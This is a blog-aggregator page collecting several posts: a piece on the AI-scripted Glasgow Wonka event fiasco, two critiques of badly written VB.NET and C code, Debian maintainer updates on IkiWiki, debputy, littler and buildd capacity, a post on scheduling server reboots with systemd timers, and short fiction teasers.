Planet Russell

,

Charles StrossA Wonky Experience

A Wonka Story

This is no longer in the current news cycle, but definitely needs to be filed under "stuff too insane for Charlie to make up", or maybe "promising screwball comedy plot line to explore", or even "perils of outsourcing creative media work to generative AI".

So. Last weekend saw insane news-generating scenes in Glasgow around a public event aimed at children: Willy's Chocolate Experience, a blatant attempt to cash in on Roald Dahl's cautionary children's tale, "Willy Wonka and the Chocolate Factory". Which is currently most prominently associated in the zeitgeist with a 2004 movie directed by Tim Burton, who probably needs no introduction, even to a cinematic illiterate like me. Although I gather a prequel movie (called, predictably, Wonka), came out in 2023.

(Because sooner or later the folks behind "House of Illuminati Ltd" will wise up and delete the website, here's a handy link to how it looked on February 24th via archive.org.)

INDULGE IN A CHOCOLATE FANTASY LIKE NEVER BEFORE - CAPTURE THE ENCHANTMENT ™!

Tickets to Willys Chocolate Experience™ are on sale now!

The event was advertised with amazing, almost hallucinogenic, graphics that were clearly AI generated, and equally clearly not proofread because Stable Diffusion utterly sucks at writing English captions, as opposed to word salad offering enticements such as Catgacating • live performances • Cartchy tuns, exarserdray lollipops, a pasadise of sweet teats.* And tickets were on sale for a mere £35 per child!

Anyway, it hit the news (and not in a good way) and the event was terminated on day one after the police were called. Here's The Guardian's coverage:

The event publicity promised giant mushrooms, candy canes and chocolate fountains, along with special audio and visual effects, all narrated by dancing Oompa-Loompas - the tiny, orange men who power Wonka's chocolate factory in the Roald Dahl book which inspired the prequel film.

But instead, when eager families turned up to the address in Whiteinch, an industrial area of Glasgow, they discovered a sparsely decorated warehouse with a scattering of plastic props, a small bouncy castle and some backdrops pinned against the walls.

Anyway, since the near-riot and hasty shutdown of the event, things have ... recomplicated? I think that's the diplomatic way to phrase it.

First, someone leaked the script for the event on twitter. They'd hired actors and evidently used ChatGPT to generate a script for the show: some of the actors quit in despair, others made a valliant attempt to at least amuse the children. But it didn't work. Interactive audience-participation events are hard work and this one apparently called for the sort of special effects that Disney's Imagineers might have blanched at, or at least asked, "who's paying for this?"

Here's a ThreadReader transcript of the twitter thread about the script (ThreadReader chains tweets together into a single web page, so you don't have to log into the hellsite itself). Note it's in the shape of screenshots of the script and threadreader didn't grab the images, so here's my transcript of the first three:

DIRECTION: (Audience members engage with the interactive flowers, offering compliments, to which the flowers respond with pre-recorded, whimsical thank-yous.)

Wonkidoodle 1: (to a guest) Oh, and if you see a butterfly, whisper your sweetest dream to it. They're our official secret keepers and dream carriers of the garden!

Willy McDuff: (gathering everyone's attention) Now, I must ask, has anyone seen the elusive Bubble Bloom? It's a rare flower that blooms just once every blue moon and fills the air with shimmering bubbles!

DIRECTION: (The stage crew discreetly activates bubble machines, filling the area with bubbles, causing excitement and wonder among the audience.)

Wonkidoodle 2: (pretending to catch bubbles) Quick! Each bubble holds a whisper of enchantment--catch one, and make a wish!

Willy McDuff: (as the bubble-catching frenzy continues) Remember, in the Garden of Enchantment, every moment is a chance for magic, every corner hides a story, and every bubble... (catches a bubble) holds a dream.

DIRECTION: (He opens his hand, and the bubble gently pops, releasing a small, twinkling light that ascends into the rafters, leaving the audience in awe.)

Willy McDuff: (with warmth) My dear friends, take this time to explore, to laugh, and to dream. For in this garden, the magic is real, and the possibilities are endless. And who knows? The next wonder you encounter may just be around the next bend.

DIRECTION: Scene ends with the audience fully immersed in the interactive, magical experience, laughter and joy filling the air as Willy McDuff and the Wonkidoodles continue to engage and delight with their enchanting antics and treats.

DIRECTION: Transition to the Bubble and Lemonade Room

Willy McDuff: (suddenly brightening) Speaking of light spirits, I find myself quite parched after our...unexpected adventure. But fortune smiles upon us, for just beyond this door lies a room filled with refreshments most delightful--the Bubble and Lemonade Room!

DIRECTION: (With a flourish, Willy opens a previously unnoticed door, revealing a room where the air sparkles with floating bubbles, and rivers of sparkling lemonade flow freely.)

Willy McDuff: Here, my dear guests, you may quench your thirst with lemonade that fizzes and dances on the tongue, and chase bubbles that burst with flavors unimaginable. A toast, to adventures shared and friendships forged in the heart of the unknown!

DIRECTION: (The audience, now relieved and rejuvenated by the whimsical turn of events, follows Willy into the Bubble and Lemonade Room, laughter and chatter filling the air once more, as they immerse themselves in the joyous, bubbly wonderland.)

DIRECTION: Transition to the Bubble and Lemonade Room

Willy McDuff: (suddenly brightening) Speaking of light spirits, I find myself quite parched after our...unexpected adventure. But fortune smiles upon us, for just beyond this door lies a room filled with refreshments most delightful-the Bubble and Lemonade Room!

DIRECTION: (With a flourish, Willy opens a previously unnoticed door, revealing a room where the air sparkles with floating bubbles, and rivers of sparkling lemonade flow freely.)

And here is a photo of the Lemonade Room in all its glory.

A trestle table with some paper cups half-full of flat lemonade

Note that in the above directions, near as I can make out, there were no stage crew on site. As Seamus O'Reilly put it, "I get that lazy and uncreative people will use AI to generate concepts. But if the script it barfs out has animatronic flowers, glowing orbs, rivers of lemonade and giggling grass, YOU still have to make those things exist. I'm v confused as to how that part was misunderstood."

Now, if that was all there was to it, it'd merely be annoying. My initial take was that this was a blatant rip-off, a consumer fraud perpetrated by a company ("House of Illuminati") based in London, doing everything by remote control over the internet to fleece those gullible provincials of their wallet contents. (Oh, and that probably includes the actors: did they get paid on the day?) But aftershocks are still rumbling on, a week later.

Per The Daily Beast, "House of Illuminati" issued an apology (via Facebook) on Friday, offering to refund all tickets—but then mysteriously deleted the apology hours later, and posted a new one:

"I want to extend my sincerest apologies to each and every one of you who was looking forward to this event," the latest Facebook post from House of Illuminati reads. "I understand the disappointment and frustration this has caused, and for that, I am truly sorry."

(The individual behind the post goes unnamed.)

"It's important for me to clarify that the organization and decisions surrounding this event were solely my responsibility," the post continues. "I want to make it clear that anyone who was hired externally or offered their help, are not affiliated with the me or the company, any use of faces can cause serious harm to those who did not have any involvement in the making of this event."

"Regarding a personal matter, there will be no wedding, and no wedding was funded by the ticket sales," the post continues further, sans context. "This is a difficult time for me, and I ask for your understanding and privacy."

"There will be no wedding, and no wedding was funded by the ticket sales?" (What on Earth is going on here?)

Finally, The Daily Beast notes that Billy McFarland, the creator of the Fyre Fest fiasco, told TMZ he'd love to give the Wonka organizers a second chance at getting things right at Fyre Fest II.

The mind boggles.

I am now wondering if the whole thing wasn't some sort of extraordinarily elaborate publicity stunt rather than simply a fraud, but I can't for the life of me work out what was going on. Unless it was Jimmy Cauty and Bill Drummond (aka The KLF) getting up to hijinks again? But I can't imagine them doing anything so half-assed ... Least-bad case is that an idiot decided to set up an events company ("how hard can running public arts events be?" —don't answer that) and intended to use the profits and the experience to plan their dream wedding. Which then ran off the rails into a ditch, rolled over, exploded in flames, was sucked up by a tornado and deposited in Oz, their fiancée called off the engagement and eloped with a walrus, and—

It's all downhill from here.

Anyway, the moral of the story so far is: don't use generative AI tools to write scripts for public events, or to produce promotional images, or indeed to do anything at all without an experienced human to sanity check their output! And especially don't use them to fund your wedding ...

UPDATE: Identity of scammer behind Willy's Chocolate Experience exposed -- Youtube video, I haven't had a chance to watch it all yet, will summarize if relevant later; the perp has form for selling ChatGPT generated ebook-shaped "objects" via Amazon.

NEW UPDATE: Glasgow's disastrous Wonka character inspires horror film

A villain devised for the catastrophic Willy's Chocolate Experience, who makes sweets and lives in walls, is to become the subject of a new horror movie.

LATEST UPDATE: House of Illuminati claims "copywrite", "we will protect our interests".

The 'Meth Lab Oompa Loompa Lady' is selling greetings on Cameo for $25.

And Eleanor Morton has a new video out, Glasgow Wonka Experience Tourguide Doesn't Give a F*.

FINAL UPDATE: Props from botched Willy Wonka event raise over £2,000 for Palestinian aid charity: Glasgow record shop Monorail Music auctioned the props on eBay after they were discovered in a bin outside the warehouse where event took place. (So some good came of it in the end ...)

Worse Than FailureCodeSOD: Exceptional String Comparisons

As a general rule, I will actually prefer code that is verbose and clear over code that is concise but makes me think. I really don't like to think if I don't have to.

Of course, there's the class of WTF code that is verbose, unclear and also really bad, which Thomas sends us today:

Private Shared Function Mailid_compare(ByVal queryEmail As String, ByVal FnsEmail As String) As Boolean
    Try
        Dim str1 As String = queryEmail
        Dim str2 As String = FnsEmail
        If String.Compare(str1, str2) = 0 Then
            Return True
        Else
            Return False
        End If
    Catch ex As Exception
    End Try
End Function

This VB .Net function could easily be replaced with String.Compare(queryEmail, FnsEmail) = 0. Of course, that'd be a little unclear, and since we only care about equality, we could just use String.Equals(queryEmail, FnsEmail)- which is honestly clearer than having a method called Mailid_compare, which doesn't actually tell me anything useful about what it does.

Speaking of not doing anything useful, there are a few other pieces of bloat in this function.

First, we plop our input parameters into the variables str1 and str2, which does a great job of making what's happening here less clear. Then we have the traditional "use an if statement to return either true or false".

But the real special magic in this one is the Try/Catch. This is a pretty bog standard useless exception handler. No operation in this function throws an exception- String.Compare will even happily accept null references. Even if somehow an exception was thrown, we wouldn't do anything about it. As a bonus, we'd return a null in that case, throwing downstream code into a bad state.

What's notable in this case, is that every function was implemented this way. Every function had a Try/Catch that frequently did nothing, or rarely (usually when they copy/pasted from StackOverflow) printed out the error message, but otherwise just let the program continue.

And that's the real WTF: a codebase polluted with so many do-nothing exception handlers that exceptions become absolutely worthless. Errors in the program let it continue, and the users experience bizarre, inconsistent states as the application fails silently.

Or, to put it another way: this is the .NET equivalent of classic VB's On Error Resume Next, which is exactly the kind of terrible idea it sounds like.

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

365 Tomorrows‘Lineartrope 04.96’

Author: David Dumouriez I thought I was ready. “I was on the precipice, looking down.” Internal count of five. A long five. “I was on the precipice, looking down.” Count ten. “I was on the precipice, looking down.” I noticed a brief, impatient nod. The nod meant ‘again’. I thought. “I was on the precipice […]

The post ‘Lineartrope 04.96’ appeared first on 365tomorrows.

,

Planet DebianJonathan Dowland: a bug a day

I recently became a maintainer of/committer to IkiWiki, the software that powers my site. I also took over maintenance of the Debian package. Last week I cut a new upstream point release, 3.20200202.4, and a corresponding Debian package upload, consisting only of a handful of low-hanging-fruit patches from other people, largely to exercise both processes.

I've been discussing IkiWiki's maintenance situation with some other users for a couple of years now. I've also weighed up the pros and cons of moving to a different static-site-generator (a term that describes what IkiWiki is, but was actually coined more recently). It turns out IkiWiki is exceptionally flexible and powerful: I estimate the cost of moving to something modern(er) and fashionable such as Jekyll, Hugo or Hakyll as unreasonably high, in part because they are surprisingly rigid and inflexible in some key places.

Like most mature software, IkiWiki has a bug backlog. Over the past couple of weeks, as a sort-of "palate cleanser" around work pieces, I've tried to triage one IkiWiki bug per day: either upstream or in the Debian Bug Tracker. This is a really lightweight task: it can be as simple as "find a bug reported in Debian, copy it upstream, tag it upstream, mark it forwarded; perhaps taking 5-10 minutes.

Often I'll stumble across something that has already been fixed but not recorded as such as I go.

Despite this minimal level of work, I'm quite satisfied with the cumulative progress. It's notable to me how much my perspective has shifted by becoming a maintainer: I'm considering everything through a different lens to that of being just one user.

Eventually I will put some time aside to scratch some of my own itches (html5 by default; support dark mode; duckduckgo plugin; use the details tag...) but for now this minimal exercise is of broader use.

Worse Than FailureCodeSOD: Contains a Substring

One of the perks of open source software is that it means that large companies can and will patch it for their needs. Which means we can see what a particular large electronics vendor did with a video player application.

For example, they needed to see if the URL pointed to a stream protected by WideVine, Vudu, or Netflix. They can do this by checking if the filename contains a certain substring. Let's see how they accomplished this…

int get_special_protocol_type(char *filename, char *name)
{
	int type = 0;
	int fWidevine = 0;
	int j;
    	char proto_str[2800] = {'\0', };
      	if (!strcmp("http", name))
       {
		strcpy(proto_str, filename);
		for(j=0;proto_str[j] != '\0';j++)
		{
			if(proto_str[j] == '=')
			{
				j++;
				if(proto_str[j] == 'W')
				{
					j++;
					if(proto_str[j] == 'V')
					{
						type = Widevine_PROTOCOL;
					}
				}
			}
		}
		if (type == 0)
		{
			for(j=0;proto_str[j] != '\0';j++)
			{
				if(proto_str[j] == '=')
				{
					j++;
					if(proto_str[j] == 'V')
					{
						j++;
						if(proto_str[j] == 'U')
						{
							j++;
							if(proto_str[j] == 'D')
							{
								j++;
								if(proto_str[j] == 'U')
								{
									type = VUDU_PROTOCOL;
								}
							}
						}
					}
				}
			}
		}
 		if (type == 0)
      		{
			for(j=0;proto_str[j] != '\0';j++)
			{
				if(proto_str[j] == '=')
				{
					j++;
					if(proto_str[j] == 'N')
					{
						j++;
						if(proto_str[j] == 'F')
						{
							j++;
							if(proto_str[j] == 'L')
							{
								j++;
								if(proto_str[j] == 'X')
								{
									type = Netflix_PROTOCOL;
								}
							}
						}
					}
				}
			}
		}
      	}
	return type;
}

For starters, there's been a lot of discussion around the importance of memory safe languages lately. I would argue that in C/C++ it's not actually hard to write memory safe code, it's just very easy not to. And this is an example- everything in here is a buffer overrun waiting to happen. The core problem is that we're passing pure pointers to char, and relying on the strings being properly null terminated. So we're using the old, unsafe string functions to never checking against the bounds of proto_str to make sure we haven't run off the edge. A malicious input could easily run off the end of the string.

But also, let's talk about that string comparison. They don't even just loop across a pair of strings character by character, they use this bizarre set of nested ifs with incrementing loop variables. Given that they use strcmp, I think we can safely assume the C standard library exists for their target, which means strnstr was right there.

It's also worth noting that, since this is a read-only operation, the strcpy is not necessary, though we're in a rough place since they're passing a pointer to char and not including the size, which gets us back to the whole "unsafe string operations" problem.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

365 TomorrowsSecond-Hand Blades

Author: Julian Miles, Staff Writer “The only things I work with are killers and currency. You don’t look dangerous, and I don’t see you waving cash.” The man brushes imaginary specks from his lapels with the hand not holding a dagger, then gives a little grin as he replies. “Appearances can be- aack!” The man […]

The post Second-Hand Blades appeared first on 365tomorrows.

xkcdGreenland Size

Planet DebianValhalla's Things: Piecepack and postcard boxes

Posted on March 25, 2024
Tags: madeof:bits, craft:cartonnage

This article has been originally posted on November 4, 2023, and has been updated (at the bottom) since.

An open cardboard box, showing the lining in paper printed with a medieval music manuscript.

Thanks to All Saints’ Day, I’ve just had a 5 days weekend. One of those days I woke up and decided I absolutely needed a cartonnage box for the cardboard and linocut piecepack I’ve been working on for quite some time.

I started drawing a plan with measures before breakfast, then decided to change some important details, restarted from scratch, did a quick dig through the bookbinding materials and settled on 2 mm cardboard for the structure, black fabric-like paper for the outside and a scrap of paper with a manuscript print for the inside.

Then we had the only day with no rain among the five, so some time was spent doing things outside, but on the next day I quickly finished two boxes, at two different heights.

The weather situation also meant that while I managed to take passable pictures of the first stages of the box making in natural light, the last few stages required some creative artificial lightning, even if it wasn’t that late in the evening. I need to build1 myself a light box.

And then decided that since they are C6 sized, they also work well for postcards or for other A6 pieces of paper, so I will probably need to make another one when the piecepack set will be finally finished.

The original plan was to use a linocut of the piecepack suites as the front cover; I don’t currently have one ready, but will make it while printing the rest of the piecepack set. One day :D

an open rectangular cardboard box, with a plastic piecepack set in it.

One of the boxes was temporarily used for the plastic piecepack I got with the book, and that one works well, but since it’s a set with standard suites I think I will want to make another box, using some of the paper with fleur-de-lis that I saw in the stash.

I’ve also started to write detailed instructions: I will publish them as soon as they are ready, and then either update this post, or they will be mentioned in an additional post if I will have already made more boxes in the meanwhile.


Update 2024-03-25: the instructions have been published on my craft patterns website


  1. you don’t really expect me to buy one, right? :D↩︎

,

Planet DebianAnuradha Weeraman: Testing again

Planet DebianAnuradha Weeraman: This is a test

Planet DebianNiels Thykier: debputy v0.1.21

Earlier today, I have just released debputy version 0.1.21 to Debian unstable. In the blog post, I will highlight some of the new features.

Package boilerplate reduction with automatic relationship substvar

Last month, I started a discussion on rethinking how we do relationship substvars such as the ${misc:Depends}. These generally ends up being boilerplate runes in the form of Depends: ${misc:Depends}, ${shlibs:Depends} where you as the packager has to remember exactly which runes apply to your package.

My proposed solution was to automatically apply these substvars and this feature has now been implemented in debputy. It is also combined with the feature where essential packages should use Pre-Depends by default for dpkg-shlibdeps related dependencies.

I am quite excited about this feature, because I noticed with libcleri that we are now down to 3-5 fields for defining a simple library package. Especially since most C library packages are trivial enough that debputy can auto-derive them to be Multi-Arch: same.

As an example, the libcleric1 package is down to 3 fields (Package, Architecture, Description) with Section and Priority being inherited from the Source stanza. I have submitted a MR to show case the boilerplate reduction at https://salsa.debian.org/siridb-team/libcleri/-/merge_requests/3.

The removal of libcleric1 (= ${binary:Version}) in that MR relies on another existing feature where debputy can auto-derive a dependency between an arch:any -dev package and the library package based on the .so symlink for the shared library. The arch:any restriction comes from the fact that arch:all and arch:any packages are not built together, so debputy cannot reliably see across the package boundaries during the build (and therefore refuses to do so at all).

Packages that have already migrated to debputy can use debputy migrate-from-dh to detect any unnecessary relationship substitution variables in case you want to clean up. The removal of Multi-Arch: same and intra-source dependencies must be done manually and so only be done so when you have validated that it is safe and sane to do. I was willing to do it for the show-case MR, but I am less confident that would bother with these for existing packages in general.

Note: I summarized the discussion of the automatic relationship substvar feature earlier this month in https://lists.debian.org/debian-devel/2024/03/msg00030.html for those who want more details.

PS: The automatic relationship substvars feature will also appear in debhelper as a part of compat 14.

Language Server (LSP) and Linting

I have long been frustrated by our poor editor support for Debian packaging files. To this end, I started working on a Language Server (LSP) feature in debputy that would cover some of our standard Debian packaging files. This release includes the first version of said language server, which covers the following files:

  • debian/control
  • debian/copyright (the machine readable variant)
  • debian/changelog (mostly just spelling)
  • debian/rules
  • debian/debputy.manifest (syntax checks only; use debputy check-manifest for the full validation for now)

Most of the effort has been spent on the Deb822 based files such as debian/control, which comes with diagnostics, quickfixes, spellchecking (but only for relevant fields!), and completion suggestions.

Since not everyone has a LSP capable editor and because sometimes you just want diagnostics without having to open each file in an editor, there is also a batch version for the diagnostics via debputy lint. Please see debputy(1) for how debputy lint compares with lintian if you are curious about which tool to use at what time.

To help you getting started, there is a now debputy lsp editor-config command that can provide you with the relevant editor config glue. At the moment, emacs (via eglot) and vim with vim-youcompleteme are supported.

For those that followed the previous blog posts on writing the language server, I would like to point out that the command line for running the language server has changed to debputy lsp server and you no longer have to tell which format it is. I have decided to make the language server a "polyglot" server for now, which I will hopefully not regret... Time will tell. :)

Anyhow, to get started, you will want:

$ apt satisfy 'dh-debputy (>= 0.1.21~), python3-pygls'
# Optionally, for spellchecking
$ apt install python3-hunspell hunspell-en-us
# For emacs integration
$ apt install elpa-dpkg-dev-el markdown-mode-el
# For vim integration via vim-youcompleteme
$ apt install vim-youcompleteme

Specifically for emacs, I also learned two things after the upload. First, you can auto-activate eglot via eglot-ensure. This badly feature interacts with imenu on debian/changelog for reasons I do not understand (causing a several second start up delay until something times out), but it works fine for the other formats. Oddly enough, opening a changelog file and then activating eglot does not trigger this issue at all. In the next version, editor config for emacs will auto-activate eglot on all files except debian/changelog.

The second thing is that if you install elpa-markdown-mode, emacs will accept and process markdown in the hover documentation provided by the language server. Accordingly, the editor config for emacs will also mention this package from the next version on.

Finally, on a related note, Jelmer and I have been looking at moving some of this logic into a new package called debpkg-metadata. The point being to support easier reuse of linting and LSP related metadata - like pulling a list of known fields for debian/control or sharing logic between lintian-brush and debputy.

Minimal integration mode for Rules-Requires-Root

One of the original motivators for starting debputy was to be able to get rid of fakeroot in our build process. While this is possible, debputy currently does not support most of the complex packaging features such as maintscripts and debconf. Unfortunately, the kind of packages that need fakeroot for static ownership tend to also require very complex packaging features.

To bridge this gap, the new version of debputy supports a very minimal integration with dh via the dh-sequence-zz-debputy-rrr. This integration mode keeps the vast majority of debhelper sequence in place meaning most dh add-ons will continue to work with dh-sequence-zz-debputy-rrr. The sequence only replaces the following commands:

  • dh_fixperms
  • dh_gencontrol
  • dh_md5sums
  • dh_builddeb

The installations feature of the manifest will be disabled in this integration mode to avoid feature interactions with debhelper tools that expect debian/<pkg> to contain the materialized package.

On a related note, the debputy migrate-from-dh command now supports a --migration-target option, so you can choose the desired level of integration without doing code changes. The command will attempt to auto-detect the desired integration from existing package features such as a build-dependency on a relevant dh sequence, so you do not have to remember this new option every time once the migration has started. :)

Planet DebianMarco d'Itri: CISPE's call for new regulations on VMware

A few days ago CISPE, a trade association of European cloud providers, published a press release complaining about the new VMware licensing scheme and asking for regulators and legislators to intervene.

But VMware does not have a monopoly on virtualization software: I think that asking regulators to interfere is unnecessary and unwise, unless, of course, they wish to question the entire foundations of copyright. Which, on the other hand, could be an intriguing position that I would support...

I believe that over-reliance on a single supplier is a typical enterprise risk: in the past decade some companies have invested in developing their own virtualization infrastructure using free software, while others have decided to rely entirely on a single proprietary software vendor.

My only big concern is that many public sector organizations will continue to use VMware and pay the huge fees designed by Broadcom to extract the maximum amount of money from their customers. However, it is ultimately the citizens who pay these bills, and blaming the evil US corporation is a great way to avoid taking responsibility for these choices.

"Several CISPE members have stated that without the ability to license and use VMware products they will quickly go bankrupt and out of business."

Insert here the Jeremy Clarkson "Oh no! Anyway..." meme.

365 TomorrowsVerbatim Thirst

Author: Gabriel Walker Land In every direction there was nothing but baked dirt, tumbleweeds, and flat death. The blazing sun weighed down on me. I didn’t know which way to walk, and I didn’t know why. How I’d gotten there was long since forgotten. Being lost wasn’t the pressing problem. No, the immediate threat was […]

The post Verbatim Thirst appeared first on 365tomorrows.

Planet DebianJacob Adams: Regular Reboots

Uptime is often considered a measure of system reliability, an indication that the running software is stable and can be counted on.

However, this hides the insidious build-up of state throughout the system as it runs, the slow drift from the expected to the strange.

As Nolan Lawson highlights in an excellent post entitled Programmers are bad at managing state, state is the most challenging part of programming. It’s why “did you try turning it off and on again” is a classic tech support response to any problem.

In addition to the problem of state, installing regular updates periodically requires a reboot, even if the rest of the process is automated through a tool like unattended-upgrades.

For my personal homelab, I manage a handful of different machines running various services.

I used to just schedule a day to update and reboot all of them, but that got very tedious very quickly.

I then moved the reboot to a cronjob, and then recently to a systemd timer and service.

I figure that laying out my path to better management of this might help others, and will almost certainly lead to someone telling me a better way to do this.

UPDATE: Turns out there’s another option for better systemd cron integration. See systemd-cron below.

Stage One: Reboot Cron

The first, and easiest approach, is a simple cron job. Just adding the following line to /var/spool/cron/crontabs/root1 is enough to get your machine to reboot once a month2 on the 6th at 8:00 AM3:

0 8 6 * * reboot

I had this configured for many years and it works well. But you have no indication as to whether it succeeds except for checking your uptime regularly yourself.

Stage Two: Reboot systemd Timer

The next evolution of this approach for me was to use a systemd timer. I created a regular-reboot.timer with the following contents:

[Unit]
Description=Reboot on a Regular Basis

[Timer]
Unit=regular-reboot.service
OnBootSec=1month

[Install]
WantedBy=timers.target

This timer will trigger the regular-reboot.service systemd unit when the system reaches one month of uptime.

I’ve seen some guides to creating timer units recommend adding a Wants=regular-reboot.service to the [Unit] section, but this has the consequence of running that service every time it starts the timer. In this case that will just reboot your system on startup which is not what you want.

Care needs to be taken to use the OnBootSec directive instead of OnCalendar or any of the other time specifications, as your system could reboot, discover its still within the expected window and reboot again. With OnBootSec your system will not have that problem. Technically, this same problem could have occurred with the cronjob approach, but in practice it never did, as the systems took long enough to come back up that they were no longer within the expected window for the job.

I then added the regular-reboot.service:

[Unit]
Description=Reboot on a Regular Basis
Wants=regular-reboot.timer

[Service]
Type=oneshot
ExecStart=shutdown -r 02:45

You’ll note that this service is actually scheduling a specific reboot time via the shutdown command instead of just immediately rebooting. This is a bit of a hack needed because I can’t control when the timer runs exactly when using OnBootSec. This way different systems have different reboot times so that everything doesn’t just reboot and fail all at once. Were something to fail to come back up I would have some time to fix it, as each machine has a few hours between scheduled reboots.

One you have both files in place, you’ll simply need to reload configuration and then enable and start the timer unit:

systemctl daemon-reload
systemctl enable --now regular-reboot.timer

You can then check when it will fire next:

# systemctl status regular-reboot.timer
● regular-reboot.timer - Reboot on a Regular Basis
     Loaded: loaded (/etc/systemd/system/regular-reboot.timer; enabled; preset: enabled)
     Active: active (waiting) since Wed 2024-03-13 01:54:52 EDT; 1 week 4 days ago
    Trigger: Fri 2024-04-12 12:24:42 EDT; 2 weeks 4 days left
   Triggers: ● regular-reboot.service

Mar 13 01:54:52 dorfl systemd[1]: Started regular-reboot.timer - Reboot on a Regular Basis.

Sidenote: Replacing all Cron Jobs with systemd Timers

More generally, I’ve now replaced all cronjobs on my personal systems with systemd timer units, mostly because I can now actually track failures via prometheus-node-exporter. There are plenty of ways to hack in cron support to the node exporter, but just moving to systemd units provides both support for tracking failure and logging, both of which make system administration much easier when things inevitably go wrong.

systemd-cron

An alternative to converting everything by hand, if you happen to have a lot of cronjobs is systemd-cron. It will make each crontab and /etc/cron.* directory into automatic service and timer units.

Thanks to Alexandre Detiste for letting me know about this project. I have few enough cron jobs that I’ve already converted, but for anyone looking at a large number of jobs to convert you’ll want to check it out!

Stage Three: Monitor that it’s working

The final step here is confirm that these units actually work, beyond just firing regularly.

I now have the following rule in my prometheus-alertmanager rules:

  - alert: UptimeTooHigh
    expr: (time() - node_boot_time_seconds{job="node"}) / 86400 > 35
    annotations:
      summary: "Instance  Has Been Up Too Long!"
      description: "Instance  Has Been Up Too Long!"

This will trigger an alert anytime that I have a machine up for more than 35 days. This actually helped me track down one machine that I had forgotten to set up this new unit on4.

Not everything needs to scale

Is It Worth The Time

One of the most common fallacies programmers fall into is that we will jump to automating a solution before we stop and figure out how much time it would even save.

In taking a slow improvement route to solve this problem for myself, I’ve managed not to invest too much time5 in worrying about this but also achieved a meaningful improvement beyond my first approach of doing it all by hand.

  1. You could also add a line to /etc/crontab or drop a script into /etc/cron.monthly depending on your system. 

  2. Why once a month? Mostly to avoid regular disruptions, but still be reasonably timely on updates. 

  3. If you’re looking to understand the cron time format I recommend crontab guru

  4. In the long term I really should set up something like ansible to automatically push fleetwide changes like this but with fewer machines than fingers this seems like overkill. 

  5. Of course by now writing about it, I’ve probably doubled the amount of time I’ve spent thinking about this topic but oh well… 

,

Planet DebianDirk Eddelbuettel: littler 0.3.20 on CRAN: Moar Features!

max-heap image

The twentyfirst release of littler as a CRAN package landed on CRAN just now, following in the now eighteen year history (!!) as a package started by Jeff in 2006, and joined by me a few weeks later.

littler is the first command-line interface for R as it predates Rscript. It allows for piping as well for shebang scripting via #!, uses command-line arguments more consistently and still starts faster. It also always loaded the methods package which Rscript only began to do in recent years.

littler lives on Linux and Unix, has its difficulties on macOS due to yet-another-braindeadedness there (who ever thought case-insensitive filesystems as a default were a good idea?) and simply does not exist on Windows (yet – the build system could be extended – see RInside for an existence proof, and volunteers are welcome!). See the FAQ vignette on how to add it to your PATH. A few examples are highlighted at the Github repo:, as well as in the examples vignette.

This release contains another fair number of small changes and improvements to some of the scripts I use daily to build or test packages, adds a new front-end ciw.r for the recently-released ciw package offering a ‘CRAN Incoming Watcher’, a new helper installDeps2.r (extending installDeps.r), a new doi-to-bib converter, allows a different temporary directory setup I find helpful, deals with one corner deployment use, and more.

The full change description follows.

Changes in littler version 0.3.20 (2024-03-23)

  • Changes in examples scripts

    • New (dependency-free) helper installDeps2.r to install dependencies

    • Scripts rcc.r, tt.r, tttf.r, tttlr.r use env argument -S to set -t to r

    • tt.r can now fill in inst/tinytest if it is present

    • New script ciw.r wrapping new package ciw

    • tttf.t can now use devtools and its loadall

    • New script doi2bib.r to call the DOI converter REST service (following a skeet by Richard McElreath)

  • Changes in package

    • The CI setup uses checkout@v4 and the r-ci-setup action

    • The Suggests: is a little tighter as we do not list all packages optionally used in the the examples (as R does not check for it either)

    • The package load messag can account for the rare build of R under different architecture (Berwin Turlach in #117 closing #116)

    • In non-vanilla mode, the temporary directory initialization in re-run allowing for a non-standard temp dir via config settings

My CRANberries service provides a comparison to the previous release. Full details for the littler release are provided as usual at the ChangeLog page, and also on the package docs website. The code is available via the GitHub repo, from tarballs and now of course also from its CRAN page and via install.packages("littler"). Binary packages are available directly in Debian as well as (in a day or two) Ubuntu binaries at CRAN thanks to the tireless Michael Rutter.

Comments and suggestions are welcome at the GitHub repo.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianBits from Debian: New Debian Developers and Maintainers (January and February 2024)

The following contributors got their Debian Developer accounts in the last two months:

  • Carles Pina i Estany (cpina)
  • Dave Hibberd (hibby)
  • Soren Stoutner (soren)
  • Daniel Gröber (dxld)
  • Jeremy Sowden (azazel)
  • Ricardo Ribalda Delgado (ribalda)

The following contributors were added as Debian Maintainers in the last two months:

  • Joachim Bauch
  • Ananthu C V
  • Francesco Ballarin
  • Yogeswaran Umasankar
  • Kienan Stewart

Congratulations!

Planet DebianKentaro Hayashi: How about allocating more buildd resource for armel and armhf?

This article is cross-posting from grow-your-ideas. This is just an idea.

salsa.debian.org

The problem

According to Developer Machines [1], current buildd machines are like this:

  • armel: 4 buildd (4 for arm64/armhf/armel)
  • armhf: 7 buildd (4 for arm64/armhf/armel and 3 for armhf only)

[1] https://db.debian.org/machines.cgi

In contrast to other buildd architectures, these instances are quite a few and it seems that it causes a shortage of buildd resourses. (e.g. during mass transition, give-back turn around time becomes longer and longer.)

Actual situation

As you know, during 64bit time_t transition, many packages should be built, but it seems that +b1 or +bN build becomes slower. (I've hit BD-Uninstalled some times because of missing dependency rebuild)

ref. https://qa.debian.org/dose/debcheck/unstable_main/index.html

Expected situation

Allocate more buildd resources for armel and armhf.

It is just an idea, but how about assigning some buildd as armel/armhf buildd?

Above buildd is used only for arm64 buildd currently.

Maybe there is some technical reason not suitable for armel/armhf buildd, but I don't know yet.

2024/03/24 UPDATE: arm-arm01,arm-arm03,arm-arm-04 has already assigned to armel/armhf buildd, so it is an invalid proposal. See https://buildd.debian.org/status/architecture.php?a=armhf&suite=sid&buildd=buildd_arm64-arm-arm-01, https://buildd.debian.org/status/architecture.php?a=armhf&suite=sid&buildd=buildd_arm64-arm-arm-03, https://buildd.debian.org/status/architecture.php?a=armhf&suite=sid&buildd=buildd_arm64-arm-arm-04

Additional information

  • arm64: 10 buildd (4 for arm64/armhf/armel, 6 for arm64 only)
  • amd64: 7 buildd (5 for amd64/i386 buildd)
  • riscv64: 9 buildd

Planet DebianErich Schubert: Do not get Amazon Kids+ or a Fire HD Kids

